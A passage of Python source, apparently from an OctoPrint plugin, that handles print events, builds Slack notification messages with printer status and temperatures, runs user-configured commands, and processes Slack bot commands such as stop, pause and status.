##~~ PrintProgress mixin
def on_print_progress(self, location, path, progress):
try:
progress_interval = int(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("IntervalPct")
)
self._logger.debug(
"Progress: "
+ str(progress)
+ " - IntervalPct: "
+ str(progress_interval)
)
if (
progress > 0
and progress < 100
and progress_interval > 0
and progress % progress_interval == 0
):
self.handle_event(
"Progress", None, {"progress": progress}, False, False, None
)
except Exception as e:
self._logger.exception(
"Error processing progress event, Error: " + str(e.message)
)
##~~ EventPlugin mixin
def progress_timer_tick(self):
self._logger.debug("Progress timer tick")
self.handle_event("Progress", None, {}, False, False, None)
print_cancel_time = None
progress_timer = None
heartbeat_timer = None
def start_progress_timer(self):
progress_event = self._settings.get(["supported_events"], merged=True).get(
"Progress"
)
progress_notification_enabled = progress_event.get("Enabled")
progress_command_enabled = progress_event.get("CommandEnabled")
if not progress_notification_enabled and not progress_command_enabled:
return
progress_timer_interval = int(progress_event.get("IntervalTime"))
if (
progress_timer_interval > 0
and (self._printer.is_printing() or self._printer.is_paused())
and not self._printer.is_ready()
):
self._logger.debug(
"Starting progress timer: " + str(progress_timer_interval) + "min(s)"
)
self.progress_timer = RepeatedTimer(
progress_timer_interval * 60, self.progress_timer_tick, run_first=False
)
self.progress_timer.start()
def update_progress_timer(self):
restart = False
progress_event = self._settings.get(["supported_events"], merged=True).get(
"Progress"
)
progress_notification_enabled = progress_event.get("Enabled")
progress_command_enabled = progress_event.get("CommandEnabled")
if not progress_notification_enabled and not progress_command_enabled:
self.stop_progress_timer()
return
new_interval = int(progress_event.get("IntervalTime"))
if self.progress_timer == None and new_interval > 0:
restart = True
else:
existing_interval = 0
if not self.progress_timer == None:
existing_interval = self.progress_timer.interval
##OctoPrint wraps the interval in a lambda function
if callable(existing_interval):
existing_interval = existing_interval()
existing_interval = existing_interval / 60
self._logger.debug("New progress interval: " + str(new_interval))
self._logger.debug(
"Previous progress interval: " + str(existing_interval)
)
if new_interval != existing_interval:
restart = True
if restart and new_interval > 0:
self.stop_progress_timer()
self.start_progress_timer()
def stop_progress_timer(self):
if not self.progress_timer == None:
self._logger.debug("Stopping progress timer")
self.progress_timer.cancel()
self.progress_timer = None
def heartbeat_timer_tick(self):
self._logger.debug("Heartbeat timer tick")
##Color may be updated in process_slack_event
self.handle_event("Heartbeat", None, {}, False, False, None)
def start_heartbeat_timer(self):
heartbeat_event = self._settings.get(["supported_events"], merged=True).get(
"Heartbeat"
)
heartbeat_notification_enabled = heartbeat_event.get("Enabled")
heartbeat_command_enabled = heartbeat_event.get("CommandEnabled")
if not heartbeat_notification_enabled and not heartbeat_command_enabled:
return
heartbeat_timer_interval = int(heartbeat_event.get("IntervalTime"))
if heartbeat_timer_interval > 0:
self._logger.debug(
"Starting heartbeat timer: " + str(heartbeat_timer_interval) + "min(s)"
)
self.heartbeat_timer = RepeatedTimer(
heartbeat_timer_interval * 60,
self.heartbeat_timer_tick,
run_first=False,
)
self.heartbeat_timer.start()
def update_heartbeat_timer(self):
restart = False
heartbeat_event = self._settings.get(["supported_events"], merged=True).get(
"Heartbeat"
)
heartbeat_notification_enabled = heartbeat_event.get("Enabled")
heartbeat_command_enabled = heartbeat_event.get("CommandEnabled")
if not heartbeat_notification_enabled and not heartbeat_command_enabled:
self.stop_heartbeat_timer()
return
new_interval = int(heartbeat_event.get("IntervalTime"))
if self.heartbeat_timer == None and new_interval > 0:
restart = True
else:
existing_interval = 0
if not self.heartbeat_timer == None:
existing_interval = self.heartbeat_timer.interval
##OctoPrint wraps the interval in a lambda function
if callable(existing_interval):
existing_interval = existing_interval()
existing_interval = existing_interval / 60
self._logger.debug("New heartbeat interval: " + str(new_interval))
self._logger.debug(
"Previous heartbeat interval: " + str(existing_interval)
)
if new_interval != existing_interval:
restart = True
if restart and new_interval > 0:
self.stop_heartbeat_timer()
self.start_heartbeat_timer()
def stop_heartbeat_timer(self):
if not self.heartbeat_timer == None:
self._logger.debug("Stopping heartbeat timer")
self.heartbeat_timer.cancel()
self.heartbeat_timer = None
last_trigger_height = 0.0
def process_zheight_change(self, payload):
if not self._printer.is_printing():
return False
if not "new" in payload:
return False
height_interval = float(
self._settings.get(["supported_events"], merged=True)
.get("Progress")
.get("IntervalHeight")
)
if height_interval <= 0:
return False
new = payload["new"]
if new <= self.last_trigger_height:
return False
if new >= (self.last_trigger_height + height_interval):
self._logger.debug(
"ZChange interval: "
+ str(height_interval)
+ ", Last trigger height: "
+ str(self.last_trigger_height)
+ ", Payload: "
+ json.dumps(payload)
)
self.last_trigger_height = new
return True
return False
def on_event(self, event, payload):
self.handle_event(event, None, payload, False, False, None)
event_last_processed = {} ##event --> timestamp map
def handle_event(
self,
event,
channel_override,
payload,
override_notification_enabled_check,
override_command_enabled_check,
event_settings_overrides,
):
try:
if event == "PrintCancelled":
self.stop_progress_timer()
self.print_cancel_time = time.time()
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
elif event == "PrintFailed":
self.stop_progress_timer()
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
ignore_cancel_fail_event = self._settings.get(
["ignore_cancel_fail_event"], merged=True
)
##If the ignore flag is enabled and we've seen a PrintCancelled within 30s, ignore the PrintFailed event
if (
ignore_cancel_fail_event
and not self.print_cancel_time == None
and (time.time() - self.print_cancel_time) < 30
):
self._logger.debug(
"Ignoring PrintFailed event within accecptable window of a PrintCancelled event"
)
return
elif event == "PrintStarted":
self.start_progress_timer()
self.print_cancel_time = None
self.last_trigger_height = 0.0
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
self._slack_next_progress_snapshot_time = 0
elif event == "PrintDone":
self.stop_progress_timer()
self.print_cancel_time = None
self._bot_progress_last_req = None
with self._bot_progress_last_snapshot_queue.mutex:
self._bot_progress_last_snapshot_queue.queue.clear()
elif event == "ZChange":
if self.process_zheight_change(payload):
self.handle_event("Progress", None, payload, False, False, None)
return
elif event == "MetadataAnalysisFinished":
##If using OctoPrint-PrintTimeGenius, don't register the finished event until its actually done
if payload and "result" in payload:
analysis_result = payload["result"]
if (
"analysisPending" in analysis_result
and analysis_result["analysisPending"]
):
return
supported_events = self._settings.get(["supported_events"], merged=True)
if supported_events == None or not event in supported_events:
return
event_settings = supported_events[event]
if event_settings == None:
return
if not event_settings_overrides == None:
for key in event_settings_overrides:
event_settings[key] = event_settings_overrides[key]
notification_enabled = (
override_notification_enabled_check or event_settings["Enabled"]
)
command_enabled = (
override_command_enabled_check or event_settings["CommandEnabled"]
)
if not notification_enabled and not command_enabled:
return
if payload == None:
payload = {}
self._logger.debug(
"Event: "
+ event
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
+ ", Payload: "
+ str(payload)
)
last_processed_key = event
if event == "GcodeEvent":
last_processed_key = event + "_" + event_settings["InternalName"]
if (
"MinNotificationInterval" in event_settings
and last_processed_key in self.event_last_processed
and not override_notification_enabled_check
):
min_notification_interval = int(
event_settings["MinNotificationInterval"]
)
if min_notification_interval > 0:
prev_timestamp = self.event_last_processed[last_processed_key]
now = time.time()
if now < (prev_timestamp + (min_notification_interval * 60)):
self._logger.debug(
"Ignoring "
+ event
+ " event to satisfy min notification interval"
)
return
self.event_last_processed[last_processed_key] = time.time()
self.process_slack_event(
event,
event_settings,
channel_override,
payload,
notification_enabled,
command_enabled,
)
except Exception as e:
self._logger.exception(
"Error processing event: " + event + ", Error: " + str(e.message)
)
def get_origin_text(self, print_origin):
if print_origin == "local":
return "OctoPrint"
elif print_origin == "sdcard":
return "SD Card"
elif print_origin == None:
return "N/A"
return print_origin
def process_slack_event(
self,
event,
event_settings,
channel_override,
event_payload,
notification_enabled,
command_enabled,
):
fallback = ""
pretext = ""
title = ""
text = ""
text_arr = []
color = ""
fields = []
footer = ""
command = ""
includeSnapshot = False
reportPrinterState = False
reportEnvironment = False
reportJobState = False
reportJobOrigEstimate = False
reportJobProgress = False
reportMovieStatus = False
reportFinalPrintTime = False
includeSupportedCommands = False
bold_text_start, bold_text_end, name_val_sep, newline = (
self.get_formatting_elements()
)
if (
channel_override == None or len(channel_override.strip()) == 0
) and "ChannelOverride" in event_settings:
channel_override = event_settings["ChannelOverride"]
if "Fallback" in event_settings:
fallback = event_settings["Fallback"]
if "Message" in event_settings:
pretext = event_settings["Message"]
if "Color" in event_settings:
color = event_settings["Color"]
if "Command" in event_settings:
command = event_settings["Command"]
if "CaptureSnapshot" in event_settings:
includeSnapshot = event_settings["CaptureSnapshot"]
if "ReportPrinterState" in event_settings:
reportPrinterState = event_settings["ReportPrinterState"]
if "ReportEnvironment" in event_settings:
reportEnvironment = event_settings["ReportEnvironment"]
if "ReportJobState" in event_settings:
reportJobState = event_settings["ReportJobState"]
if "ReportJobOrigEstimate" in event_settings:
reportJobOrigEstimate = event_settings["ReportJobOrigEstimate"]
if "ReportJobProgress" in event_settings:
reportJobProgress = event_settings["ReportJobProgress"]
if "ReportMovieStatus" in event_settings:
reportMovieStatus = event_settings["ReportMovieStatus"]
if "ReportFinalPrintTime" in event_settings:
reportFinalPrintTime = event_settings["ReportFinalPrintTime"]
if "IncludeSupportedCommands" in event_settings:
includeSupportedCommands = event_settings["IncludeSupportedCommands"]
replacement_params = {
"{print_name}": "N/A",
"{pct_complete}": "N/A",
"{current_z}": "N/A",
"{elapsed_time}": "N/A",
"{remaining_time}": "N/A",
"{eta}": "N/A",
"{error}": "N/A",
"{cmd}": "N/A",
"{ip_address}": "N/A",
"{hostname}": "N/A",
"{fqdn}": "N/A",
"{printer_status}": "N/A",
}
printer_data = self._printer.get_current_data()
printer_state = printer_data["state"]
job_state = printer_data["job"]
z_height = printer_data["currentZ"]
progress_state = printer_data["progress"]
file_name = job_state["file"]["name"]
if file_name == None:
file_name = "N/A"
##Override the print_name variable for the analysis events
if event == "MetadataAnalysisStarted" or event == "MetadataAnalysisFinished":
if "name" in event_payload:
file_name = event_payload["name"]
else:
file_name = "N/A"
print_origin = "N/A"
if "origin" in event_payload:
print_origin = self.get_origin_text(event_payload["origin"])
fileStr = file_name + " (via " + print_origin + ")"
text_arr.append(
bold_text_start + "File" + bold_text_end + name_val_sep + fileStr
)
if event == "MetadataAnalysisFinished":
estimated_print_time = "N/A"
analysis_print_time = None
compensated_print_time = None
if "result" in event_payload:
analysis_result = event_payload["result"]
if "estimatedPrintTime" in analysis_result:
estimated_print_time = self.format_duration(
analysis_result["estimatedPrintTime"]
)
if "analysisPrintTime" in analysis_result:
analysis_print_time = self.format_duration(
analysis_result["analysisPrintTime"]
)
if "compensatedPrintTime" in analysis_result:
compensated_print_time = self.format_duration(
analysis_result["compensatedPrintTime"]
)
if analysis_print_time and compensated_print_time:
text_arr.append(
bold_text_start
+ "Analyzed print time estimate"
+ bold_text_end
+ name_val_sep
+ analysis_print_time
)
text_arr.append(
bold_text_start
+ "Compensated print time estimate"
+ bold_text_end
+ name_val_sep
+ compensated_print_time
)
else:
text_arr.append(
bold_text_start
+ "Estimated print time"
+ bold_text_end
+ name_val_sep
+ estimated_print_time
)
replacement_params["{print_name}"] = file_name
z_height_str = ""
if not z_height == None and not z_height == "None":
z_height_str = ", Nozzle Height: " + "{0:.2f}".format(z_height) + "mm"
replacement_params["{current_z}"] = z_height_str
printer_text = printer_state["text"]
if not printer_text == None:
printer_text = printer_text.strip()
replacement_params["{printer_status}"] = printer_text
self._logger.debug("Printer data: " + str(printer_data))
##Override Heartbeat event color if printer is in an error state
if event == "Heartbeat" and self._printer.is_closed_or_error():
color = "danger"
if reportJobState:
print_origin = job_state["file"]["origin"]
print_origin = self.get_origin_text(print_origin)
file_bytes = job_state["file"]["size"]
if file_bytes == None:
file_bytes = 0
file_size = octoprint.util.get_formatted_size(file_bytes)
if file_bytes > 0:
jobStateStr = (
file_name + " (" + file_size + " via " + print_origin + ")"
)
else:
jobStateStr = file_name
text_arr.append(
bold_text_start + "File" + bold_text_end + name_val_sep + jobStateStr
)
if reportJobOrigEstimate:
estimatedPrintTime = None
if "lastPrintTime" in job_state:
estimatedPrintTime = job_state["lastPrintTime"]
if estimatedPrintTime == None:
estimatedPrintTime = job_state["estimatedPrintTime"]
if estimatedPrintTime == None:
estimatedPrintTime = "N/A"
estimatedPrintTimeStr = "N/A"
else:
estimatedPrintTimeStr = self.format_duration(estimatedPrintTime)
if self._printer.is_printing():
estimatedFinish = self.format_eta(estimatedPrintTime)
else:
estimatedFinish = "N/A"
replacement_params["{remaining_time}"] = estimatedPrintTimeStr
replacement_params["{eta}"] = estimatedFinish
text_arr.append(
bold_text_start
+ "Estimated print time"
+ bold_text_end
+ name_val_sep
+ estimatedPrintTimeStr
)
if event != "PrintDone" and self._printer.is_printing():
text_arr.append(
bold_text_start
+ "ETA"
+ bold_text_end
+ name_val_sep
+ estimatedFinish
)
if event == "Progress" and "progress" in event_payload:
pct_complete = event_payload["progress"]
else:
pct_complete = progress_state["completion"]
if not pct_complete == None:
pct_complete = str(int(pct_complete)) + "%"
if not pct_complete == None:
replacement_params["{pct_complete}"] = pct_complete
elapsed = progress_state["printTime"]
time_left = progress_state["printTimeLeft"]
elapsed_str = self.format_duration(elapsed)
replacement_params["{elapsed_time}"] = elapsed_str
##Use existing remaining time if it's already been set
if replacement_params["{remaining_time}"] == "N/A":
time_left_str = self.format_duration(time_left)
replacement_params["{remaining_time}"] = time_left_str
else:
time_left_str = replacement_params["{remaining_time}"]
##Use existing ETA if it's already been set
if replacement_params["{eta}"] == "N/A" and self._printer.is_printing():
eta_str = self.format_eta(time_left)
replacement_params["{eta}"] = eta_str
else:
eta_str = replacement_params["{eta}"]
if reportJobProgress and not pct_complete == None:
text_arr.append(
bold_text_start + "Elapsed" + bold_text_end + name_val_sep + elapsed_str
)
text_arr.append(
bold_text_start
+ "Remaining"
+ bold_text_end
+ name_val_sep
+ time_left_str
)
if self._printer.is_printing():
text_arr.append(
bold_text_start + "ETA" + bold_text_end + name_val_sep + eta_str
)
##Is rendered as a footer so it's safe to always include this
if reportPrinterState:
printer_temps = self._printer.get_current_temperatures()
temp_str = ""
if not printer_temps == None and "bed" in printer_temps:
temp_str = ""
for key in printer_temps:
if key == "bed":
temp_str += (
", Bed: "
+ str(printer_temps["bed"]["actual"])
+ unichr(176)
+ "C/"
+ str(printer_temps["bed"]["target"])
+ unichr(176)
+ "C"
)
elif key.startswith("tool"):
nozzle_name = "Nozzle"
printer_profile = (
self._printer_profile_manager.get_current_or_default()
)
shared_nozzle = printer_profile["extruder"]["sharedNozzle"]
nozzle_number = key[4:]
if shared_nozzle and nozzle_number and nozzle_number != "0":
# only show the first nozzle if they are 'shared'
self._logger.debug(
"Skipping nozzle {} because it is shared.".format(
nozzle_number
)
)
else:
if len(printer_temps) > 2:
nozzle_name += key[4:]
temp_str += (
", "
+ nozzle_name
+ ": "
+ str(printer_temps[key]["actual"])
+ unichr(176)
+ "C/"
+ str(printer_temps[key]["target"])
+ unichr(176)
+ "C"
)
footer = "Printer: " + printer_text + temp_str + z_height_str
##Skip this if not sending a notification (not current available for command execution)
if notification_enabled and self._settings.get(
["include_raspi_temp"], merged=True
):
rpi_tmp = None
try:
p = run("/opt/vc/bin/vcgencmd measure_temp", stdout=Capture())
rpi_tmp = p.stdout.text
if not rpi_tmp == None and rpi_tmp.startswith("temp="):
rpi_tmp = rpi_tmp.strip()
rpi_tmp = rpi_tmp[5:-2]
else:
rpi_tmp = None
except Exception as e:
if type(e) == ValueError:
self._logger.error(
"Unable to execute Raspberry Pi command (/opt/vc/bin/vcgencmd): "
+ e.message
)
else:
self._logger.exception(
"Error reading Raspberry Pi temp - Error: " + str(e)
)
if not rpi_tmp == None:
if len(footer) > 0:
footer += ", "
footer += "RasPi: " + rpi_tmp + unichr(176) + "C"
if reportEnvironment:
if len(footer) > 0:
footer += ", "
footer += "OctoPrint: " + get_octoprint_version_string()
footer += ", " + self._plugin_name + ": v" + self._plugin_version
final_time = "N/A"
if event == "PrintDone" and "time" in event_payload:
final_time = self.format_duration(event_payload["time"])
replacement_params["{elapsed_time}"] = final_time
if reportFinalPrintTime:
text_arr.append(
bold_text_start
+ "Final print time"
+ bold_text_end
+ name_val_sep
+ final_time
)
if event == "GcodeEvent" and "cmd" in event_payload:
replacement_params["{cmd}"] = event_payload["cmd"]
if reportMovieStatus:
movie_name = None
print_filename = None
if "movie_basename" in event_payload:
movie_name = event_payload["movie_basename"]
if "gcode" in event_payload:
print_filename = event_payload["gcode"]
if not movie_name == None:
text_arr.append(
bold_text_start
+ "Movie"
+ bold_text_end
+ name_val_sep
+ movie_name
)
if not print_filename == None:
text_arr.append(
bold_text_start
+ "Print job"
+ bold_text_end
+ name_val_sep
+ print_filename
)
ips = self.get_ips()
ips_str = ", ".join(ips)
replacement_params["{ip_address}"] = ips_str
replacement_params["{hostname}"] = self.get_hostname()
replacement_params["{fqdn}"] = self.get_fqdn()
if includeSupportedCommands:
enabled_commands = self._settings.get(
["slack_rtm_enabled_commands"], merged=True
)
unauthorized_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_unauthorized_reaction")
authorized_users = self._settings.get(
["slack_rtm_authorized_users"], merged=True
)
if len(authorized_users.strip()) == 0:
authorized_users = None
if enabled_commands["help"]["enabled"]:
text_arr.append(
bold_text_start
+ "help"
+ bold_text_end
+ " - Displays this list of commands"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["help"]["restricted"]
else ""
)
)
if enabled_commands["status"]["enabled"]:
text_arr.append(
bold_text_start
+ "status"
+ bold_text_end
+ " - Display the current print job status"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["status"]["restricted"]
else ""
)
)
if enabled_commands["stop"]["enabled"]:
text_arr.append(
bold_text_start
+ "stop"
+ bold_text_end
+ " - Stop the current print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["stop"]["restricted"]
else ""
)
)
if enabled_commands["pause"]["enabled"]:
text_arr.append(
bold_text_start
+ "pause"
+ bold_text_end
+ " - Pause the current print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["pause"]["restricted"]
else ""
)
)
if enabled_commands["resume"]["enabled"]:
text_arr.append(
bold_text_start
+ "resume"
+ bold_text_end
+ " - Resume a paused print"
+ (
" " + unauthorized_reaction
if authorized_users and enabled_commands["resume"]["restricted"]
else ""
)
)
error = None
if "error" in event_payload:
error = event_payload["error"]
if not error == None:
error = error.strip()
if not error == None and len(error) > 0:
text_arr.append(
bold_text_start + "Error" + bold_text_end + name_val_sep + error
)
replacement_params["{error}"] = error
if not text_arr == None and len(text_arr) > 0:
text = newline.join(text_arr)
for param in replacement_params:
if not fallback == None:
fallback = fallback.replace(param, replacement_params[param])
if not pretext == None:
pretext = pretext.replace(param, replacement_params[param])
if not title == None:
title = title.replace(param, replacement_params[param])
if not text == None:
text = text.replace(param, replacement_params[param])
if not footer == None:
footer = footer.replace(param, replacement_params[param])
if not command == None:
command = command.replace(param, shell_quote(replacement_params[param]))
for field in fields:
if "title" in field:
field["title"] = field["title"].replace(
param, replacement_params[param]
)
if "value" in field:
field["value"] = field["value"].replace(
param, replacement_params[param]
)
##Execute custom command
capture_command_returncode = False
capture_command_output = False
if (
notification_enabled
and "CaptureCommandReturnCode" in event_settings
and event_settings["CaptureCommandReturnCode"]
):
capture_command_returncode = True
if (
notification_enabled
and "CaptureCommandOutput" in event_settings
and event_settings["CaptureCommandOutput"]
):
capture_command_output = True
command_thread = None
command_thread_rsp = None
if command_enabled:
command_thread_rsp = Queue.Queue()
command_thread = threading.Thread(
target=self.execute_command,
args=(event, command, capture_command_output, command_thread_rsp),
)
command_thread.start()
##Execute notification send
if notification_enabled:
notification_thread = threading.Thread(
target=self.send_slack_message,
args=(
event,
event_settings,
event_payload,
channel_override,
fallback,
pretext,
title,
text,
color,
fields,
footer,
includeSnapshot,
replacement_params["{pct_complete}"],
command_thread,
command_thread_rsp,
capture_command_returncode,
capture_command_output,
),
)
notification_thread.start()
# Currrently only querying IPv4 although the library supports IPv6 as well
def get_ips(self):
ips = []
try:
for interface in netifaces.interfaces():
for link in netifaces.ifaddresses(interface).get(netifaces.AF_INET, ()):
addr = link["addr"]
if addr == None or len(addr.strip()) == 0 or addr != "127.0.0.1":
ips.append(addr)
except Exception as e:
self._logger.exception("Failed to query IP address: " + str(e))
ips = []
ips.append("'IP detection error'")
return ips
def get_hostname(self):
try:
return socket.gethostname()
except Exception as e:
self._logger.exception("Failed to query hostname: " + str(e))
return "Hostname detection error"
def get_fqdn(self):
try:
return socket.getfqdn()
except Exception as e:
self._logger.exception("Failed to query fqdn: " + str(e))
return "Fqdn detection error"
def start_rtm_client(self):
self.stop_rtm_client()
if not self._settings.get(["slack_apitoken_config"], merged=True).get(
"enable_commands"
):
return
connection_method = self.connection_method()
if connection_method == None or connection_method != "APITOKEN":
self._logger.debug("Slack RTM client not enabled")
return
slackAPIToken = self._settings.get(["slack_apitoken_config"], merged=True).get(
"api_token"
)
if not slackAPIToken:
self._logger.warn(
"Cannot enable real time messaging client for responding to commands without an API Key"
)
return
slackAPIToken = slackAPIToken.strip()
self._logger.debug("Before Slack RTM client start")
self.rtm_keep_running = True
self.bot_user_id = None
t = threading.Thread(target=self.execute_rtm_loop, args=(slackAPIToken,))
t.setDaemon(True)
t.start()
self._logger.debug("After Slack RTM client start")
def stop_rtm_client(self):
self._logger.debug("Stopping Slack RTM client")
self.rtm_keep_running = False
def execute_rtm_loop(self, slackAPIToken):
try:
ping_interval = 5
self._logger.debug("Starting Slack RTM wait loop")
sc = None
connection_attempt = 0
next_ping = 0
repeat_error_count = 0
while self.rtm_keep_running:
while sc == None or not sc.server.connected:
try:
##Reset read error count if we're reconnecting
repeat_error_count = 0
##Roll over the counter to keep delay calculations under control
if connection_attempt > 100:
connection_attempt = 0
self._logger.debug(
"Attempting to connect Slack RTM API (iteration="
+ str(connection_attempt)
+ ")"
)
wait_delay = self.get_rtm_reconnect_delay(connection_attempt)
if wait_delay > 0:
self._logger.debug(
"Sleeping for "
+ str(wait_delay)
+ " seconds before attempting connection"
)
time.sleep(wait_delay)
slackAPIConnection = Slacker(
slackAPIToken, timeout=SLACKER_TIMEOUT
)
auth_rsp = slackAPIConnection.auth.test()
self._logger.debug(
"Slack RTM API Key auth test response: "
+ json.dumps(auth_rsp.body)
)
if auth_rsp.successful == None or auth_rsp.successful == False:
self._logger.error(
"Slack RTM API Key auth test failed: "
+ json.dumps(auth_rsp.body)
)
connection_attempt += 1
continue
self.bot_user_id = auth_rsp.body["user_id"]
self._logger.debug("Slack RTM Bot user id: " + self.bot_user_id)
##Slack's client doesn't expose the underlying websocket/socket
##so we unfortunately need to rely on Python's GC to handle
##the socket disconnect
sc = SlackClient(slackAPIToken)
if sc.rtm_connect(with_team_state=False):
self._logger.debug(
"Successfully reconnected via Slack RTM API"
)
connection_attempt = 0
next_ping = time.time() + ping_interval
else:
self._logger.error("Failed to reconnect via Slack RTM API")
connection_attempt += 1
except Exception as e:
self._logger.error(
"Slack RTM API connection error (Exception): " + str(e)
)
connection_attempt += 1
try:
if next_ping > 0 and time.time() >= next_ping:
ping_rsp = sc.server.ping()
next_ping = time.time() + ping_interval
read_msgs = sc.rtm_read()
if read_msgs:
for msg in read_msgs:
try:
self.process_rtm_message(slackAPIToken, msg)
##Reset error counter if we've successfully processed a message
repeat_error_count = 0
except Exception as e:
self._logger.error(
"Slack RTM message processing error: " + str(e),exc_info=e
)
else:
time.sleep(0.5)
except WebSocketConnectionClosedException as ce:
self._logger.error(
"Slack RTM API read error (WebSocketConnectionClosedException): "
+ str(ce.message), exc_info=ce
)
time.sleep(1)
sc = None
except Exception as e:
error_str = str(e)
self._logger.error(
"Slack RTM API read error (Exception): " + error_str
)
##Ovserved errors on windows (WebSocketConnectionClosedException was not thrown)
##HTTPSConnectionPool(host='slack.com', port=443): Max retries exceeded with url: /api/rtm.start (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x000000000A6FB278>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed',))
##[Errno 10054] An existing connection was forcibly closed by the remote host
if (
"Max retries exceeded" in error_str
or "NewConnectionError" in error_str
or "Errno 10054" in error_str
or "Errno 11001" in error_str
or "forcibly closed" in error_str
):
self._logger.error(
"Slack RTM API experienced a fatal connection error. Resetting connection."
)
sc = None
time.sleep(1)
repeat_error_count += 1
if repeat_error_count >= 100:
self._logger.error(
"Slack RTM API experienced 100 back to back read errors. Resetting connection."
)
sc = None
self._logger.debug("Finished Slack RTM read loop")
except Exception as e:
self._logger.exception(
"Error in Slack RTM read loop, Error: " + str(e.message)
)
def get_rtm_reconnect_delay(self, iteration):
max_delay = 1800 ##30 minutes
try:
delay = (2 ** iteration) * 5
if delay <= 0 or delay > max_delay:
return max_delay
return delay
except Exception as e:
self._logger.exception(
"Slack RTM reconnect delay calculation error (iteration="
+ str(iteration)
+ "), Error: "
+ str(e.message)
)
return max_delay
def process_rtm_message(self, slackAPIToken, message):
if not self._settings.get(["slack_apitoken_config"], merged=True).get(
"enable_commands"
):
return
slack_identity_config = self._settings.get(["slack_identity"], merged=True)
slack_as_user = slack_identity_config["existing_user"]
alternate_bot_name = None
if not slack_as_user:
if "username" in slack_identity_config:
alternate_bot_name = slack_identity_config["username"]
alternate_bot_id = None
if not alternate_bot_name == None and len(alternate_bot_name.strip()) > 0:
alternate_bot_id = "@" + alternate_bot_name.strip()
if (self.bot_user_id == None and alternate_bot_id == None) or message == None:
return
if message.get("type") != "message" or message.get("text") == None:
return
bot_id = "<@" + self.bot_user_id + ">"
message_text = message.get("text", "")
matched_id = None
self._logger.debug("matching BI " + str(bot_id) + " and MT " + str(message_text) + " and ABI " + str(alternate_bot_id))
if not message_text:
# no need to test a blank message
return
elif bot_id in message_text:
matched_id = bot_id
elif alternate_bot_id and alternate_bot_id in message_text:
matched_id = alternate_bot_id
else:
return
self._logger.debug("Slack RTM Read: " + json.dumps(message))
source_userid = message.get("user")
source_username = self.get_slack_username(slackAPIToken, source_userid)
self._logger.debug(
"Slack RTM message source UserID: "
+ str(source_userid)
+ ", Username: "
+ str(source_username)
)
channel = message["channel"]
timestamp = message["ts"]
command = message["text"].split(matched_id)[1].strip().lower()
reaction = ""
positive_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_positive_reaction")
negative_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_negative_reaction")
processing_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_processing_reaction")
unauthorized_reaction = self._settings.get(
["slack_apitoken_config"], merged=True
).get("commands_unauthorized_reaction")
if not positive_reaction == None:
positive_reaction = positive_reaction.strip()
if positive_reaction.startswith(":") and positive_reaction.endswith(":"):
positive_reaction = positive_reaction[1:-1].strip()
if not negative_reaction == None:
negative_reaction = negative_reaction.strip()
if negative_reaction.startswith(":") and negative_reaction.endswith(":"):
negative_reaction = negative_reaction[1:-1].strip()
if not processing_reaction == None:
processing_reaction = processing_reaction.strip()
if processing_reaction.startswith(":") and processing_reaction.endswith(
":"
):
processing_reaction = processing_reaction[1:-1].strip()
if not unauthorized_reaction == None:
unauthorized_reaction = unauthorized_reaction.strip()
if unauthorized_reaction.startswith(":") and unauthorized_reaction.endswith(
":"
):
unauthorized_reaction = unauthorized_reaction[1:-1].strip()
sent_processing_reaction = False
enabled_commands = self._settings.get(
["slack_rtm_enabled_commands"], merged=True
)
authorized_users = self._settings.get(
["slack_rtm_authorized_users"], merged=True
)
authorized_user_lookup = {}
for user in authorized_users.split(","):
user = user.strip().lower()
if len(user) > 0:
authorized_user_lookup[user] = True
if len(authorized_user_lookup) == 0:
authorized_user_lookup = None
authorized = self.is_rtm_command_authorized_user(
authorized_user_lookup, source_username, enabled_commands, command
)
if command == "help" and enabled_commands["help"]["enabled"]:
self._logger.info(
"Slack RTM - help command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
else:
self.handle_event("Help", channel, {}, True, False, None)
reaction = positive_reaction
elif command == "stop" and enabled_commands["stop"]["enabled"]:
self._logger.info(
"Slack RTM - stop command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_printing():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.cancel_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "pause" and enabled_commands["pause"]["enabled"]:
self._logger.info(
"Slack RTM - pause command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_printing():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.toggle_pause_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "resume" and enabled_commands["resume"]["enabled"]:
self._logger.info(
"Slack RTM - resume command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
elif self._printer.is_paused():
##Send processing reaction
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
self._printer.toggle_pause_print()
reaction = positive_reaction
else:
reaction = negative_reaction
elif command == "status" and enabled_commands["status"]["enabled"]:
##Send processing reaction
self._logger.info(
"Slack RTM - status command - user: "
+ source_username
+ ", authorized: "
+ str(authorized)
)
if not authorized:
reaction = unauthorized_reaction
else:
sent_processing_reaction = True
self.add_message_reaction(
slackAPIToken, channel, timestamp, processing_reaction, False
)
